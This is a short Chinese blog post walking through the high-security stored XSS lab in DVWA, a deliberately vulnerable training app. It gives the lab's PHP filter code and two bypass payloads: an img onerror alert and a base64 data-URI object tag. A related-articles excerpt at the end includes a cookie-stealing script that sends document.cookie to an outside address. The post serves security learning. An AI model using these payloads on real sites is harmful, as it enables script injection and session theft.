首页 > 其他分享 >DVWA XSS

DVWA XSS

时间:2023-03-02 20:33:54浏览次数:43  
标签:XSS base64 object DVWA mysql data

XSS Store

hign level
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = mysql_real_escape_string( $message );
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = mysql_real_escape_string( $name );

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    //mysql_close();
}

?>

payload1:

<img src=1 one rror=alert('Youareattackedbyhacker4!')>

payload2:
ps: 这个会导致博客园产生xss,所以先用>来规避一下

<>object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><>/object>

PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=为base64编码后的<script>alert('xss')</script>

标签:XSS,base64,object,DVWA,mysql,data
From: https://www.cnblogs.com/gradyblog/p/16750062.html

相关文章

  • DVWA CRSF
    主要方式就是引诱用户去点击一个是黑客精心构造的一个html中的一个按钮(或者是引诱用户去访问一个精心构造的url),而该按钮会发生一个请求给目标服务器<html><ahref="h......
  • Ubuntu之docker搭建dvwa
    前提,已经安装好docker。首先,搜索DVWA镜像,安装,安装完成后,dockerimages查看已有镜像,然后运行dvwa镜像,与容器进行交互,访问ip:端口,出现如下界面则搭建成功,点击“Create/ResetD......
  • XSS打cookie
    XSS打cookie 盲打cookiepayload<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script><imgsrc='http://192.168.......
  • wxss模板样式
               ......
  • 【转载】SQL注入与XSS攻击
    版权声明:本文为CSDN博主「PiLriD.」的原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/wenroudong/article/details/12......
  • XSS跨站之分类及攻击手法
    25、Web漏洞-XSS跨站之分类及攻击手法 XSS跨站漏洞产生原理、危害、特点原理:在变量接受数据的时候,如果接受的数据被执行了,那么就铲产生了XSS漏洞。危害:l 窃取管理......
  • XSS跨站之订单及shell箱子反杀记
    XSS平台及工具使用postman可以通过获取的cookie登陆网站的后台beef工具必须在linux中才可以使用XSS经典应用案例测试Webshell后门中的后门箱子返回的代码中添加后门,......
  • 微信小程序:如何weui.wxss中的icon?
    使用步骤:1、在app.json中设置"useExtendedLib":{"weui":true},2、icon代码<text>1</text><viewclass="weui-icon-circle"></view><viewclass......
  • 【XSS】springboot 修复 XSS漏洞
    原文参考:https://www.cnblogs.com/kinome/p/12468421.htmlHttpGetBodyimportjavax.servlet.ServletRequest;importjava.io.BufferedReader;importjava.io.IOExcep......
  • phpstudy X1.29 后台存储型xss
    phpstudyX1.29后台存储型xss今天登录同学小皮运维后台的时候发现CPU占有率达到100%排查登录服务器通过top看了下CPU占用情况,发现存在xmrig挖矿进程(当时直接kill-9结......